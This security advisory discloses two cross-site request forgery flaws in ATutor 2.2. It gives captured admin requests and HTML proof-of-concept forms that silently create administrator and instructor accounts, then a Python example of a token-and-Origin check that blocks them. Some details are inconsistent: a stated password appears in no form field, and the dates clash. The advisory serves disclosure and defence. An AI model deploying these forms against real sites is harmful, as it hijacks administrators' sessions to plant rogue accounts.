ATutor 2.2 Cross-Site Request Forgery (CSRF) Vulnerability
Published on April 10th, 2020
Summary
Multiple cross-site request forgery (CSRF) vulnerabilities in ATutor 2.2 allow remote attackers to hijack the authentication of administrators.
Credit:
The information has been provided by Edric Teo
The original article can be found at: https://seclists.org/bugtraq/2015/Mar/1
Details
1) CSRF in administrator creation page

When an authenticated administrative user of ATutor LCMS is creating another administrator account, the following POST request is sent to the server:

POST /atutor-2.2/ATutor/mods/_core/users/admins/create.php HTTP/1.1
Host: 127.0.0.1
Proxy-Connection: keep-alive
Content-Length: 187
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://127.0.0.1/atutor-2.2/ATutor/mods/_core/users/admins/create.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: ATutorID=pr6jq1tlfr204nm60p5rtbj0u4; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_sortsel=field_name; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_ordersel=ASC; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_limitsel=15; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_filtersel=default; flash=yes; PHPSESSID=tg14v79ionj9d7lpelap300p33; cms-panel-collapsed-cms-menu=false; cms-panel-collapsed-cms-content-tools-CMSPagesController=true; cms-panel-collapsed-cms-content-tools-CMSMain=false; _gat=1; _ga=GA1.1.621011711.1425057132

form_password_hidden=ef0f8b6ffb699f90933a3321b00ff6769e018b94&password_error=&login=csrfadmin9&password=&confirm_password=&real_name=&email=csrfadmin9 () admin com&priv_admin=1&submit=Save

By executing the following Proof-of-Concept, a new administrative user called "csrfadmin99" will be created with the password "1qazXSW@".

<html>
<body>
<form action="http://127.0.0.1/atutor-2.2/ATutor/mods/_core/users/admins/create.php" method="POST">
  <input type="hidden" name="form_password_hidden" value="ef0f8b6ffb699f90933a3321b00ff6769e018b94" />
  <input type="hidden" name="login" value="csrfadmin99" />
  <input type="hidden" name="real_name" value="csrfadmin99" />
  <input type="hidden" name="email" value="csrfadmin99 () admin com" />
  <input type="hidden" name="priv_admin" value="1" />
  <input type="hidden" name="submit" value="Save" />
  <input type="submit" value="Submit request" />
</form>
</body>
</html>

2) CSRF in user creation page

When an authenticated administrative user of ATutor LCMS is creating a user, the following POST request is sent to the server:

POST /atutor-2.2/ATutor/mods/_core/users/create_user.php HTTP/1.1
Host: 127.0.0.1
Proxy-Connection: keep-alive
Content-Length: 429
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://127.0.0.1/atutor-2.2/ATutor/mods/_core/users/create_user.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: ATutorID=0h3qqin6ndjmpt21m7f17i07l7; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_sortsel=field_name; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_ordersel=ASC; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_limitsel=15; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_filtersel=default; flash=yes; PHPSESSID=tg14v79ionj9d7lpelap300p33; cms-panel-collapsed-cms-menu=false; cms-panel-collapsed-cms-content-tools-CMSPagesController=true; cms-panel-collapsed-cms-content-tools-CMSMain=false; _gat=1; _ga=GA1.1.621011711.1425057132

ml=&password_error=&form_password_hidden=ef0f8b6ffb699f90933a3321b00ff6769e018b94&registration_token=19569b3551f19d60ddfbe4973d1733079f775568&login=csrfuser9&form_password1=&form_password2=&email=csrfuser9 () user com&private_email=1&email2=csrfuser9 () user com&first_name=csrfuser9&second_name=&last_name=csrfuser9&id=&status=3&old_status=&year=&month=&day=&address=&postal=&city=&province=&country=&phone=&website=&submit=+Save+

By executing the following Proof-of-Concept, a new instructor user called "csrfuser99" will be created with the password "1qazXSW@".

<html>
<body>
<form action="http://127.0.0.1/atutor-2.2/ATutor/mods/_core/users/create_user.php" method="POST">
  <input type="hidden" name="form_password_hidden" value="ef0f8b6ffb699f90933a3321b00ff6769e018b94" />
  <input type="hidden" name="login" value="csrfuser99" />
  <input type="hidden" name="email" value="csrfuser99 () user com" />
  <input type="hidden" name="private_email" value="1" />
  <input type="hidden" name="email2" value="csrfuser99 () user com" />
  <input type="hidden" name="first_name" value="csrfuser99" />
  <input type="hidden" name="last_name" value="csrfuser99" />
  <input type="hidden" name="status" value="3" />
  <input type="hidden" name="submit" value="Save" />
  <input type="submit" value="Submit request" />
</form>
</body>
</html>
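The proof-of-concept forms above submit the same fixed form_password_hidden value as the captured requests and no registration_token, so nothing in them is bound to the victim's session. The following is an added example, not ATutor's code, of the server-side check that rejects such a submission for both create pages: a per-session synchronizer token compared in constant time, plus an Origin/Referer check. The application origin, the in-memory session store and the field name csrf_token are this example's assumptions.

```python
import hmac
import secrets
from urllib.parse import urlparse

# Constructed example of a synchronizer-token CSRF check for a state-changing
# form handler such as admins/create.php or create_user.php. Not ATutor's code;
# the origin, the session store and the field name "csrf_token" are assumptions.
ALLOWED_ORIGIN = "http://127.0.0.1"   # the application's own origin (assumption)
SESSIONS = {}                         # session id -> per-session CSRF token

def issue_token(session_id):
    """Mint a fresh random token for this session and keep it server-side; the
    form page embeds it as a hidden field that another origin cannot read."""
    token = secrets.token_hex(32)
    SESSIONS[session_id] = token
    return token

def origin_ok(headers):
    """Browsers set Origin on cross-site form posts and a page cannot forge it.
    Fall back to Referer; reject when neither header is present."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    got, want = urlparse(source), urlparse(ALLOWED_ORIGIN)
    return (got.scheme, got.netloc) == (want.scheme, want.netloc)

def csrf_ok(session_id, headers, form):
    """Accept a POST only if it comes from our origin AND carries the token
    bound to the cookie session. A fixed, reusable value such as
    form_password_hidden cannot satisfy the second condition."""
    expected = SESSIONS.get(session_id)
    presented = form.get("csrf_token", "")
    if expected is None or not presented:
        return False
    # constant-time comparison so a mismatch does not leak token bytes
    return origin_ok(headers) and hmac.compare_digest(
        expected.encode(), presented.encode())

def handle_create_admin(session_id, headers, form):
    """Mimics the create handler: refuse before touching any state."""
    if not csrf_ok(session_id, headers, form):
        return {"status": 403, "created": None}
    return {"status": 200, "created": form.get("login")}
```

The cross-site case is exactly the PoC's situation: the browser attaches the victim's ATutorID cookie, but the request arrives with the other page's Origin and without the session's token, so it is refused before any account is written.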
Vulnerable System
ATutor 2.2
CVE Information:
Disclosure Timeline:
Published Date:03/01/2020